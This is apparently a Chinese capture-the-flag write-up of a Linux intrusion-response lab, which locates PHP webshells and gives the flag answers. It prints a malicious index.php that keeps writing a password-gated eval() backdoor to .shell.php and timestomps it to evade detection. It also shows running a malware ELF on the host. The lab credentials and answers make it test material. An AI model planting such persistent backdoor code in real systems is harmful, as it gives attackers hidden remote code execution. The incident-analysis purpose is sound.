1 2 3 4 5 6 7
| 账号:root 密码:linuxruqin ssh root@IP 1.web目录存在木马,请找到木马的密码提交 2.服务器疑似存在不死马,请找到不死马的密码提交 3.不死马是通过哪个文件生成的,请提交文件名 4.黑客留下了木马文件,请找出黑客的服务器ip提交 5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
|
1.web目录存在木马,请找到木马的密码提交
D盾扫一下
也可以使用命令grep -nr "eval" .
发现有1.php、index.php、.shell.php三个文件包含eval字符串
1.php是简单的一句话木马
.shell.php和index.php都是木马且有md5密码校验
答案:flag{1}
2.服务器疑似存在不死马,请找到不死马的密码提交
将md5解密得到hello
答案:flag{hello}
3.不死马是通过哪个文件生成的,请提交文件名
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
| // 引入配置文件 include('config.php');
// 引入公共函数库 include(SYS_ROOT.INC.'common.php');
// 获取当前请求的PATH_INFO(URL路径信息)以及查询字符串,并处理成标准格式 $path = $_SERVER['PATH_INFO']; $queryString = $_SERVER['QUERY_STRING']; if (!empty($queryString)) { $path .= '?' . str_replace('?', '', $queryString); }
// 如果路径信息以'/'开头,则去掉第一个'/' if (substr($path, 0, 1) == '/') { $path = substr($path, 1); }
// 对路径进行安全过滤或转义(具体实现取决于Base::safeword()方法) $path = Base::safeword($path);
// 获取GET参数中的'action'值作为控制器方法,如果没有则默认为'run' $ctrl = isset($_GET['action']) ? $_GET['action'] : 'run';
// 检查是否存在'createprocess'这个GET参数,如果存在则调用Index类的createhtml方法生成静态页面 if (isset($_GET['createprocess'])) { Index::createhtml(isset($_GET['id']) ? $_GET['id'] : 0, $_GET['cat'], $_GET['single']); } else { // 否则调用Index类的run方法处理请求 Index::run($path); }
// 创建恶意PHP脚本文件,并写入内容 // 当传入的POST参数"pass"经过md5加密后等于特定字符串时,会执行POST参数"cmd"中的PHP代码 $file = '/var/www/html/.shell.php'; $code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>'; file_put_contents($file, $code);
// 修改shell.php文件的修改时间为2021年1月1日0点0分1秒,用于规避一些基于时间的检测机制 system('touch -m -d "2021-01-01 00:00:01" .shell.php');
// 暂停程序执行3毫秒 usleep(3000);
|
index.php一直生成.shell.php
答案:flag{index.php}
4.黑客留下了木马文件,请找出黑客的服务器ip提交
答案:flag{10.11.55.21}
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
答案:flag{3333}
第四题和第五题有两种方法
方法一:
直接在服务器上运行一下木马文件(真实环境不建议使用)
1 2 3
| root@ip-10-0-10-1:/var/www/html# chmod 777 shell\(1\).elf root@ip-10-0-10-1:/var/www/html# ./shell\(1\).elf netstat -antlp
|
方法二:
使用云沙箱进行分析
我这里使用的沙箱是https://www.virustotal.com/(也可以用其他的比如微步、360的)